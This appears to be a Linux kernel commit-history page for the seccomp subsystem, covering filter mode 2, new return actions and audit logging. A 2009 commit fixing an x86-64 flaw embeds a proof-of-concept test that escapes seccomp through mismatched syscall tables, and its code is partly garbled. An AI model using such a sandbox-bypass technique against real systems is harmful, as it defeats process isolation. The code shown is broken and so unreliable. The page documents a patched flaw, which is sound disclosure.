18 Apr, 2012

1 commit


14 Apr, 2012

5 commits

  • This change adds support for a new ptrace option, PTRACE_O_TRACESECCOMP,
    and a new return value for seccomp BPF programs, SECCOMP_RET_TRACE.

    When a tracer specifies the PTRACE_O_TRACESECCOMP ptrace option, the
    tracer will be notified, via PTRACE_EVENT_SECCOMP, for any syscall that
    results in a BPF program returning SECCOMP_RET_TRACE. The 16-bit
    SECCOMP_RET_DATA mask of the BPF program return value will be passed as
    the ptrace_message and may be retrieved using PTRACE_GETEVENTMSG.

    If the subordinate process is not using seccomp filter, then no
    system call notifications will occur even if the option is specified.

    If there is no tracer with PTRACE_O_TRACESECCOMP when SECCOMP_RET_TRACE
    is returned, the system call will not be executed and an -ENOSYS errno
    will be returned to userspace.

    This change adds a dependency on the system call slow path. Any future
    efforts to use the system call fast path for seccomp filter will need to
    address this restriction.

    Signed-off-by: Will Drewry
    Acked-by: Eric Paris

    v18: - rebase
    - comment fatal_signal check
    - acked-by
    - drop secure_computing_int comment
    v17: - ...
    v16: - update PT_TRACE_MASK to 0xbf4 so that STOP isn't clear on SETOPTIONS call (indan@nul.nu)
    [note PT_TRACE_MASK disappears in linux-next]
    v15: - add audit support for non-zero return codes
    - clean up style (indan@nul.nu)
    v14: - rebase/nochanges
    v13: - rebase on to 88ebdda6159ffc15699f204c33feb3e431bf9bdc
    (Brings back a change to ptrace.c and the masks.)
    v12: - rebase to linux-next
    - use ptrace_event and update arch/Kconfig to mention slow-path dependency
    - drop all tracehook changes and inclusion (oleg@redhat.com)
    v11: - invert the logic to just make it a PTRACE_SYSCALL accelerator
    (indan@nul.nu)
    v10: - moved to PTRACE_O_SECCOMP / PT_TRACE_SECCOMP
    v9: - n/a
    v8: - guarded PTRACE_SECCOMP use with an ifdef
    v7: - introduced
    Signed-off-by: James Morris

    Will Drewry
     
  • Adds a new return value to seccomp filters that triggers a SIGSYS to be
    delivered with the new SYS_SECCOMP si_code.

    This allows in-process system call emulation, including just specifying
    an errno or cleanly dumping core, rather than just dying.

    Suggested-by: Markus Gutschke
    Suggested-by: Julien Tinnes
    Signed-off-by: Will Drewry
    Acked-by: Eric Paris

    v18: - acked-by, rebase
    - don't mention secure_computing_int() anymore
    v15: - use audit_seccomp/skip
    - pad out error spacing; clean up switch (indan@nul.nu)
    v14: - n/a
    v13: - rebase on to 88ebdda6159ffc15699f204c33feb3e431bf9bdc
    v12: - rebase on to linux-next
    v11: - clarify the comment (indan@nul.nu)
    - s/sigtrap/sigsys
    v10: - use SIGSYS, syscall_get_arch, updates arch/Kconfig
    note suggested-by (though original suggestion had other behaviors)
    v9: - changes to SIGILL
    v8: - clean up based on changes to dependent patches
    v7: - introduction
    Signed-off-by: James Morris

    Will Drewry
     
  • This change adds the SECCOMP_RET_ERRNO as a valid return value from a
    seccomp filter. Additionally, it makes the first use of the lower
    16-bits for storing a filter-supplied errno. 16-bits is more than
    enough for the errno-base.h calls.

    Returning errors instead of immediately terminating processes that
    violate seccomp policy allow for broader use of this functionality
    for kernel attack surface reduction. For example, a linux container
    could maintain a whitelist of pre-existing system calls but drop
    all new ones with errnos. This would keep a logically static attack
    surface while providing errnos that may allow for graceful failure
    without the downside of do_exit() on a bad call.

    This change also changes the signature of __secure_computing. It
    appears the only direct caller is the arm entry code and it clobbers
    any possible return value (register) immediately.

    Signed-off-by: Will Drewry
    Acked-by: Serge Hallyn
    Reviewed-by: Kees Cook
    Acked-by: Eric Paris

    v18: - fix up comments and rebase
    - fix bad var name which was fixed in later revs
    - remove _int() and just change the __secure_computing signature
    v16-v17: ...
    v15: - use audit_seccomp and add a skip label. (eparis@redhat.com)
    - clean up and pad out return codes (indan@nul.nu)
    v14: - no change/rebase
    v13: - rebase on to 88ebdda6159ffc15699f204c33feb3e431bf9bdc
    v12: - move to WARN_ON if filter is NULL
    (oleg@redhat.com, luto@mit.edu, keescook@chromium.org)
    - return immediately for filter==NULL (keescook@chromium.org)
    - change evaluation to only compare the ACTION so that layered
    errnos don't result in the lowest one being returned.
    (keeschook@chromium.org)
    v11: - check for NULL filter (keescook@chromium.org)
    v10: - change loaders to fn
    v9: - n/a
    v8: - update Kconfig to note new need for syscall_set_return_value.
    - reordered such that TRAP behavior follows on later.
    - made the for loop a little less indent-y
    v7: - introduced
    Signed-off-by: James Morris

    Will Drewry
     
  • This consolidates the seccomp filter error logging path and adds more
    details to the audit log.

    Signed-off-by: Will Drewry
    Signed-off-by: Kees Cook
    Acked-by: Eric Paris

    v18: make compat= permanent in the record
    v15: added a return code to the audit_seccomp path by wad@chromium.org
    (suggested by eparis@redhat.com)
    v*: original by keescook@chromium.org
    Signed-off-by: James Morris

    Kees Cook
     
  • [This patch depends on luto@mit.edu's no_new_privs patch:
    https://lkml.org/lkml/2012/1/30/264
    The whole series including Andrew's patches can be found here:
    https://github.com/redpig/linux/tree/seccomp
    Complete diff here:
    https://github.com/redpig/linux/compare/1dc65fed...seccomp
    ]

    This patch adds support for seccomp mode 2. Mode 2 introduces the
    ability for unprivileged processes to install system call filtering
    policy expressed in terms of a Berkeley Packet Filter (BPF) program.
    This program will be evaluated in the kernel for each system call
    the task makes and computes a result based on data in the format
    of struct seccomp_data.

    A filter program may be installed by calling:
    struct sock_fprog fprog = { ... };
    ...
    prctl(PR_SET_SECCOMP, SECCOMP_MODE_FILTER, &fprog);

    The return value of the filter program determines if the system call is
    allowed to proceed or denied. If the first filter program installed
    allows prctl(2) calls, then the above call may be made repeatedly
    by a task to further reduce its access to the kernel. All attached
    programs must be evaluated before a system call will be allowed to
    proceed.

    Filter programs will be inherited across fork/clone and execve.
    However, if the task attaching the filter is unprivileged
    (!CAP_SYS_ADMIN) the no_new_privs bit will be set on the task. This
    ensures that unprivileged tasks cannot attach filters that affect
    privileged tasks (e.g., setuid binary).

    There are a number of benefits to this approach. A few of which are
    as follows:
    - BPF has been exposed to userland for a long time
    - BPF optimization (and JIT'ing) are well understood
    - Userland already knows its ABI: system call numbers and desired
    arguments
    - No time-of-check-time-of-use vulnerable data accesses are possible.
    - system call arguments are loaded on access only to minimize copying
    required for system call policy decisions.

    Mode 2 support is restricted to architectures that enable
    HAVE_ARCH_SECCOMP_FILTER. In this patch, the primary dependency is on
    syscall_get_arguments(). The full desired scope of this feature will
    add a few minor additional requirements expressed later in this series.
    Based on discussion, SECCOMP_RET_ERRNO and SECCOMP_RET_TRACE seem to be
    the desired additional functionality.

    No architectures are enabled in this patch.

    Signed-off-by: Will Drewry
    Acked-by: Serge Hallyn
    Reviewed-by: Indan Zupancic
    Acked-by: Eric Paris
    Reviewed-by: Kees Cook

    v18: - rebase to v3.4-rc2
    - s/chk/check/ (akpm@linux-foundation.org,jmorris@namei.org)
    - allocate with GFP_KERNEL|__GFP_NOWARN (indan@nul.nu)
    - add a comment for get_u32 regarding endianness (akpm@)
    - fix other typos, style mistakes (akpm@)
    - added acked-by
    v17: - properly guard seccomp filter needed headers (leann@ubuntu.com)
    - tighten return mask to 0x7fff0000
    v16: - no change
    v15: - add a 4 instr penalty when counting a path to account for seccomp_filter
    size (indan@nul.nu)
    - drop the max insns to 256KB (indan@nul.nu)
    - return ENOMEM if the max insns limit has been hit (indan@nul.nu)
    - move IP checks after args (indan@nul.nu)
    - drop !user_filter check (indan@nul.nu)
    - only allow explicit bpf codes (indan@nul.nu)
    - exit_code -> exit_sig
    v14: - put/get_seccomp_filter takes struct task_struct
    (indan@nul.nu,keescook@chromium.org)
    - adds seccomp_chk_filter and drops general bpf_run/chk_filter user
    - add seccomp_bpf_load for use by net/core/filter.c
    - lower max per-process/per-hierarchy: 1MB
    - moved nnp/capability check prior to allocation
    (all of the above: indan@nul.nu)
    v13: - rebase on to 88ebdda6159ffc15699f204c33feb3e431bf9bdc
    v12: - added a maximum instruction count per path (indan@nul.nu,oleg@redhat.com)
    - removed copy_seccomp (keescook@chromium.org,indan@nul.nu)
    - reworded the prctl_set_seccomp comment (indan@nul.nu)
    v11: - reorder struct seccomp_data to allow future args expansion (hpa@zytor.com)
    - style clean up, @compat dropped, compat_sock_fprog32 (indan@nul.nu)
    - do_exit(SIGSYS) (keescook@chromium.org, luto@mit.edu)
    - pare down Kconfig doc reference.
    - extra comment clean up
    v10: - seccomp_data has changed again to be more aesthetically pleasing
    (hpa@zytor.com)
    - calling convention is noted in a new u32 field using syscall_get_arch.
    This allows for cross-calling convention tasks to use seccomp filters.
    (hpa@zytor.com)
    - lots of clean up (thanks, Indan!)
    v9: - n/a
    v8: - use bpf_chk_filter, bpf_run_filter. update load_fns
    - Lots of fixes courtesy of indan@nul.nu:
    -- fix up load behavior, compat fixups, and merge alloc code,
    -- renamed pc and dropped __packed, use bool compat.
    -- Added a hidden CONFIG_SECCOMP_FILTER to synthesize non-arch
    dependencies
    v7: (massive overhaul thanks to Indan, others)
    - added CONFIG_HAVE_ARCH_SECCOMP_FILTER
    - merged into seccomp.c
    - minimal seccomp_filter.h
    - no config option (part of seccomp)
    - no new prctl
    - doesn't break seccomp on systems without asm/syscall.h
    (works but arg access always fails)
    - dropped seccomp_init_task, extra free functions, ...
    - dropped the no-asm/syscall.h code paths
    - merges with network sk_run_filter and sk_chk_filter
    v6: - fix memory leak on attach compat check failure
    - require no_new_privs || CAP_SYS_ADMIN prior to filter
    installation. (luto@mit.edu)
    - s/seccomp_struct_/seccomp_/ for macros/functions (amwang@redhat.com)
    - cleaned up Kconfig (amwang@redhat.com)
    - on block, note if the call was compat (so the # means something)
    v5: - uses syscall_get_arguments
    (indan@nul.nu,oleg@redhat.com, mcgrathr@chromium.org)
    - uses union-based arg storage with hi/lo struct to
    handle endianness. Compromises between the two alternate
    proposals to minimize extra arg shuffling and account for
    endianness assuming userspace uses offsetof().
    (mcgrathr@chromium.org, indan@nul.nu)
    - update Kconfig description
    - add include/seccomp_filter.h and add its installation
    - (naive) on-demand syscall argument loading
    - drop seccomp_t (eparis@redhat.com)
    v4: - adjusted prctl to make room for PR_[SG]ET_NO_NEW_PRIVS
    - now uses current->no_new_privs
    (luto@mit.edu,torvalds@linux-foundation.com)
    - assign names to seccomp modes (rdunlap@xenotime.net)
    - fix style issues (rdunlap@xenotime.net)
    - reworded Kconfig entry (rdunlap@xenotime.net)
    v3: - macros to inline (oleg@redhat.com)
    - init_task behavior fixed (oleg@redhat.com)
    - drop creator entry and extra NULL check (oleg@redhat.com)
    - alloc returns -EINVAL on bad sizing (serge.hallyn@canonical.com)
    - adds tentative use of "always_unprivileged" as per
    torvalds@linux-foundation.org and luto@mit.edu
    v2: - (patch 2 only)
    Signed-off-by: James Morris

    Will Drewry
     

18 Jan, 2012

1 commit

  • The audit system likes to collect information about processes that end
    abnormally (SIGSEGV) as this may me useful intrusion detection information.
    This patch adds audit support to collect information when seccomp forces a
    task to exit because of misbehavior in a similar way.

    Signed-off-by: Eric Paris

    Eric Paris
     

03 Mar, 2009

1 commit

  • On x86-64, a 32-bit process (TIF_IA32) can switch to 64-bit mode with
    ljmp, and then use the "syscall" instruction to make a 64-bit system
    call. A 64-bit process make a 32-bit system call with int $0x80.

    In both these cases under CONFIG_SECCOMP=y, secure_computing() will use
    the wrong system call number table. The fix is simple: test TS_COMPAT
    instead of TIF_IA32. Here is an example exploit:

    /* test case for seccomp circumvention on x86-64

    There are two failure modes: compile with -m64 or compile with -m32.

    The -m64 case is the worst one, because it does "chmod 777 ." (could
    be any chmod call). The -m32 case demonstrates it was able to do
    stat(), which can glean information but not harm anything directly.

    A buggy kernel will let the test do something, print, and exit 1; a
    fixed kernel will make it exit with SIGKILL before it does anything.
    */

    #define _GNU_SOURCE
    #include
    #include
    #include
    #include
    #include
    #include
    #include

    int
    main (int argc, char **argv)
    {
    char buf[100];
    static const char dot[] = ".";
    long ret;
    unsigned st[24];

    if (prctl (PR_SET_SECCOMP, 1, 0, 0, 0) != 0)
    perror ("prctl(PR_SET_SECCOMP) -- not compiled into kernel?");

    #ifdef __x86_64__
    assert ((uintptr_t) dot < (1UL << 32));
    asm ("int $0x80 # %0 st_uid=%u\n", st[7]);
    else
    ret = snprintf (buf, sizeof buf, "result %ld\n", ret);
    #else
    # error "not this one"
    #endif

    write (1, buf, ret);

    syscall (__NR_exit, 1);
    return 2;
    }

    Signed-off-by: Roland McGrath
    [ I don't know if anybody actually uses seccomp, but it's enabled in
    at least both Fedora and SuSE kernels, so maybe somebody is. - Linus ]
    Signed-off-by: Linus Torvalds

    Roland McGrath
     

17 Jul, 2007

2 commits

  • This follows a suggestion from Chuck Ebbert on how to make seccomp
    absolutely zerocost in schedule too. The only remaining footprint of
    seccomp is in terms of the bzImage size that becomes a few bytes (perhaps
    even a few kbytes) larger, measure it if you care in the embedded.

    Signed-off-by: Andrea Arcangeli
    Cc: Andi Kleen
    Signed-off-by: Andrew Morton
    Signed-off-by: Linus Torvalds

    Andrea Arcangeli
     
  • This reduces the memory footprint and it enforces that only the current
    task can enable seccomp on itself (this is a requirement for a
    strightforward [modulo preempt ;) ] TIF_NOTSC implementation).

    Signed-off-by: Andrea Arcangeli
    Signed-off-by: Andrew Morton
    Signed-off-by: Linus Torvalds

    Andrea Arcangeli
     

17 Apr, 2005

1 commit

  • Initial git repository build. I'm not bothering with the full history,
    even though we have it. We can create a separate "historical" git
    archive of that later if we want to, and in the meantime it's about
    3.2GB when imported into git - space that would just make the early
    git days unnecessarily complicated, when we don't have a lot of good
    infrastructure for it.

    Let it rip!

    Linus Torvalds